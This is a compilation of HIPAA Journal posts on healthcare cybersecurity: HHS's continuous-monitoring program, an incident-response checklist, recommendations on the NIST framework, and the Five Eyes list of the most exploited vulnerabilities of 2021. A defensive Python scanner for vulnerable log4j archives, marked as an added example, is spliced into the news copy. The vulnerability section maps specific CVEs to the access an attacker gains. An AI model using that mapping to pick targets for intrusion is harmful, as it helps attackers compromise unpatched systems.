The HHS has partially implemented its Continuous Diagnostics and Mitigation (CDM) strategy, which has improved visibility into some assets, and awareness of vulnerabilities and threat information has improved through the use of RSA Archer and Splunk. Progress has been made toward implementing a full department-wide CDM program to ensure continuous monitoring of HHS networks and systems, provide real-time reporting of operating divisions’ status and progress to address and implement strategies to combat risk, prioritize issues using established risk criteria, and improve its cybersecurity response capabilities.

The HHS has advanced its implementation of CDM tools and processes but does not have a definitive schedule for fully implementing the CDM program across all operating divisions. Until the HHS fully implements its CDM strategy, it may not be able to identify cybersecurity risks on an ongoing basis, prioritize efforts to address risks based on their potential impact, and mitigate the most significant vulnerabilities first.

OIG has made several recommendations for improving the maturity of the HHS information security program. The HHS should continue with its implementation of an automated CDM solution to provide a centralized, enterprise-wide view of risks across all of HHS. The ISCM strategy needs to be updated to include a more specific roadmap, with target dates specified for ISCM deployment across all HHS operating divisions. An enterprise risk assessment of known control weaknesses should be performed and an appropriate risk response documented, and the HHS needs to develop a process to monitor information system contingency plans to ensure they are developed, maintained, and integrated with the department’s other continuity requirements. The HHS concurred with all OIG recommendations.


Operational Continuity-Cyber Incident Checklist Published by HSCC

The Health Sector Coordinating Council’s (HSCC) Cybersecurity Working Group (CWG) has published an Operational Continuity-Cyber Incident (OCCI) checklist which serves as a flexible template for responding to and recovering from serious cyberattacks that cause extended system outages, such as ransomware attacks.

Ransomware attacks on healthcare organizations increased significantly during the pandemic and continue to be conducted at elevated levels. Ransomware threat actors steal sensitive data that has a high value on the black market and threaten to publish that data to pressure victims into paying, and the extended system outages caused by the attacks can result in considerable financial losses, increasing the probability of the ransom being paid. Warnings have recently been issued by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) about ransomware groups that are actively targeting critical infrastructure, including healthcare organizations.

In addition to cybercriminal groups, hospitals are a target for nation-state threat actors. The Five Eyes cybersecurity agencies recently warned that there is an elevated threat of cyberattacks on critical infrastructure in retaliation for the sanctions imposed on Russia by the United States. There is also a risk that healthcare organizations may fall victim to cyber incidents directed at organizations in Ukraine, as was the case with the NotPetya wiper malware attacks in 2017. The development and release of the checklist were accelerated in light of the rising geopolitical tensions from the Ukraine-Russia conflict and the increased threat to healthcare organizations in the United States.

Due to the high risk of attacks, healthcare organizations need to prepare for attacks and ensure that the business can continue to operate should it not be possible to immediately restore access to critical systems. Having an incident response plan that can be immediately implemented will help to minimize the damage caused and the impact on patients and medical services.

The OCCI toolkit includes a checklist of the steps that should be taken during the first 12 hours after a security incident occurs and outlines actions and considerations for the duration of cybersecurity incidents. The checklist is broken down into role-based modules that align with the Incident Command System but can be refined or modified to match the size, resources, complexity, and capabilities of different organizations, from small physician practices up to large hospitals and health systems.

An incident commander should be appointed to provide overall strategic direction on all response actions and activities, a medical-technical specialist should advise the Incident Commander on issues related to the response, and a public information officer is required to communicate with internal and external stakeholders, site personnel, patients and their families, and the media. The checklist also provides a list of steps that need to be completed by the safety officer and section chiefs. For smaller organizations, those roles may need to be combined to suit their organizational structures.

The checklist was created from input provided by leading health sector cybersecurity and emergency management executives that participate in the HSCC Incident Response/Business Continuity (IRBC) Task Group.

The post Operational Continuity-Cyber Incident Checklist Published by HSCC appeared first on HIPAA Journal.

WEDI Makes Healthcare-Specific Recommendations for Improving the NIST Cybersecurity Framework

The Workgroup for Electronic Data Interchange (WEDI) has responded to the request for information from the National Institute of Standards and Technology (NIST) and has made several recommendations for improving the NIST cybersecurity framework and supply chain risk management guidance to help healthcare organizations deal with some of the most pressing threats facing the sector.

Ransomware is one of the main threats facing the healthcare industry, and that is unlikely to change in the short to medium term.  To help healthcare organizations deal with the threat, WEDI has suggested NIST increase its focus on ransomware and address the issue of ransomware directly in the cybersecurity framework. NIST published a new ransomware resource in February 2022, which contains valuable information on protecting against, detecting, responding to, and recovering from ransomware attacks. WEDI feels the inclusion of ransomware within the cybersecurity framework will expand the reach and impact of the resource.

WEDI has also recommended including specific case studies of healthcare organizations that have experienced a ransomware attack, updating the framework to define contingency planning strategies based on the type of healthcare organization, and issuing guidance with a focus on contingency planning, execution, and recovery. Ransomware attacks on healthcare providers carry risks that are not applicable to other entities. Further guidance in this area would be of great benefit to healthcare providers and could help to minimize disruption and patient safety issues.

Healthcare organizations have been developing patient access Application Programming Interfaces (APIs) and applications (apps) which are covered by HIPAA, and are therefore required to incorporate safeguards to ensure the privacy and security of any healthcare data they contain, but WEDI has drawn attention to the lack of robust privacy standards applicable to third-party health apps that are not covered by HIPAA. WEDI says there is a need for a national security framework to ensure that health care data obtained by third-party apps is held to appropriate privacy and security standards.

The number of risks and vulnerabilities affecting portable and implantable medical devices has grown at an incredible rate in recent years, and those risks are likely to grow exponentially in the years to come. WEDI has recommended NIST address cybersecurity issues related to these devices directly in the cybersecurity framework, and also address the issue of insider threats. Many healthcare data breaches are caused by insider threats such as lost electronic devices, phishing, and social engineering attacks. WEDI suggests these issues and security awareness training should be addressed in the cybersecurity framework.

WEDI has also recommended NIST develop a version of its cybersecurity framework that is targeted at smaller healthcare organizations, which do not have the resources available to stay informed about the latest security developments and implement the latest security measures and protocols. A version of the framework that is more focused on the threats faced by smaller organizations would be of great benefit and should include realistic proactive steps that can be taken by small healthcare organizations to mitigate risks.

The post WEDI Makes Healthcare-Specific Recommendations for Improving the NIST Cybersecurity Framework appeared first on HIPAA Journal.

15 Most Exploited Vulnerabilities in 2021

The Five Eyes security agencies, an alliance of intelligence agencies from Australia, Canada, New Zealand, the United Kingdom, and the United States, have issued a joint advisory about the 15 vulnerabilities in software and operating systems that were most commonly targeted by nation-state hackers and cybercriminal organizations in 2021.

Throughout 2021, malicious cyber actors targeted newly disclosed critical software vulnerabilities in attacks against a wide range of industry sectors, including public and private sector organizations. Eleven of the 15 most routinely targeted vulnerabilities were publicly disclosed in 2021, although older vulnerabilities continue to be exploited. The 15 most exploited vulnerabilities include 9 that allow remote code execution, 2 elevation of privilege flaws, and one each of security feature bypass, path traversal, arbitrary file reading, and arbitrary code execution.

Top of the list was the maximum severity Log4Shell vulnerability in the Apache Log4j open source logging framework. The vulnerability – CVE-2021-44228 – can be remotely exploited by a threat actor allowing the execution of arbitrary code, which would give the attacker full control of a vulnerable system. The vulnerability was only disclosed publicly in December 2021, yet still ranked first as the most commonly exploited vulnerability, demonstrating how hackers can quickly weaponize and exploit vulnerabilities before organizations can patch. The flaw was rated one of the most serious vulnerabilities to be discovered in the past decade.
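As an added example (not code from the advisory or from HIPAA Journal), a small Python inventory check a defender could run over a server's filesystem to find log4j-core archives that still carry the Log4Shell flaw. The affected version range, the fixed releases (2.15.0, and 2.12.2 on the Java 7 branch) and the JndiLookup.class removal workaround are assumptions taken from Apache's own Log4j advisory rather than from this post.

```python
import re
import zipfile
from pathlib import Path

# Added example (not from the advisory or HIPAA Journal). Assumed from the Apache
# advisory: CVE-2021-44228 affects log4j-core 2.0-beta9..2.14.1, fixed in 2.15.0
# (2.12.2 on the Java 7 branch); deleting JndiLookup.class was the workaround.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXTS = (".jar", ".war", ".ear")

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Non-numeric suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else ()

def is_vulnerable_version(version):
    """True for log4j-core 2.x below the fixed release (2.12.2 on 2.12.x, else 2.15.0)."""
    v = parse_version(version)
    if not v or v[0] != 2:
        return False
    return v < (2, 12, 2) if v[:2] == (2, 12) else v < (2, 15, 0)

def inspect_archive(path):
    """Return (version, jndi_lookup_present) for a log4j-core archive, else None."""
    try:
        with zipfile.ZipFile(path) as zf:
            names = set(zf.namelist())
            if POM_PROPS not in names:
                return None
            version = None
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
            return version, JNDI_CLASS in names
    except (zipfile.BadZipFile, OSError):
        return None

def scan(root):
    """Walk root; return [(path, version)] for archives still needing the CVE-2021-44228 fix."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in ARCHIVE_EXTS:
            continue
        info = inspect_archive(path)
        # Skip non-log4j archives; a vulnerable version minus JndiLookup.class counts as mitigated.
        if info and info[0] and is_vulnerable_version(info[0]) and info[1]:
            findings.append((str(path), info[0]))
    return findings
```

Nested archives (a log4j jar packed inside a war or a fat jar) are not opened, so on application servers the check should be pointed at the exploded deployment directory as well.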

| CVE | Vulnerability Name | Vendor and Product | Type |
|---|---|---|---|
| CVE-2021-44228 | Log4Shell | Apache Log4j | Remote code execution (RCE) |
| CVE-2021-40539 | | Zoho ManageEngine AD SelfService Plus | RCE |
| CVE-2021-34523 | ProxyShell | Microsoft Exchange Server | Elevation of privilege |
| CVE-2021-34473 | ProxyShell | Microsoft Exchange Server | RCE |
| CVE-2021-31207 | ProxyShell | Microsoft Exchange Server | Security feature bypass |
| CVE-2021-27065 | ProxyLogon | Microsoft Exchange Server | RCE |
| CVE-2021-26858 | ProxyLogon | Microsoft Exchange Server | RCE |
| CVE-2021-26857 | ProxyLogon | Microsoft Exchange Server | RCE |
| CVE-2021-26855 | ProxyLogon | Microsoft Exchange Server | RCE |
| CVE-2021-26084 | | Atlassian Confluence Server and Data Center | Arbitrary code execution |
| CVE-2021-21972 | | VMware vSphere Client | RCE |
| CVE-2020-1472 | ZeroLogon | Microsoft Netlogon Remote Protocol (MS-NRPC) | Elevation of privilege |
| CVE-2020-0688 | | Microsoft Exchange Server | RCE |
| CVE-2019-11510 | | Pulse Secure Pulse Connect Secure | Arbitrary file reading |
| CVE-2018-13379 | | Fortinet FortiOS and FortiProxy | Path traversal |

The remote code execution vulnerability in Zoho ManageEngine AD SelfService Plus – CVE-2021-40539 – has a 9.8 CVSS severity rating and was the second most exploited vulnerability, with attacks exploiting the vulnerability continuing in 2022. The flaw can be exploited remotely and allows web shells to be implanted in a network, allowing the attacker to compromise credentials, move laterally, and exfiltrate sensitive data.

The ProxyLogon flaws in Microsoft Exchange email servers were also extensively exploited. These flaws – CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065 – allow remote attackers to execute arbitrary code on vulnerable Exchange servers to gain access to files and mailboxes on the servers, along with any credentials stored on them.

Three ProxyShell vulnerabilities made the top 15 list. These vulnerabilities – CVE-2021-34523, CVE-2021-34473, CVE-2021-31207 – can be exploited on Microsoft Exchange email servers that have the Microsoft Client Access Service (CAS) exposed to the Internet. This is a common configuration that allows users to access their emails on their mobile devices and via web browsers. The flaws can be exploited to remotely execute arbitrary code on vulnerable servers.

In many cases, vulnerabilities were exploited within two weeks of the vulnerabilities being publicly disclosed, most commonly as a result of security researchers publishing proof-of-concept exploits, which helped a much broader range of threat actors quickly exploit the vulnerabilities before organizations had the time to patch.

A further 21 vulnerabilities are listed that are also routinely exploited, including many from 2021 and some dating back to 2017. Patching these vulnerabilities promptly will ensure they cannot be exploited. The Five Eyes agencies have also included a list of mitigations that make it harder for threat actors to exploit these and other vulnerabilities.

The post 15 Most Exploited Vulnerabilities in 2021 appeared first on HIPAA Journal.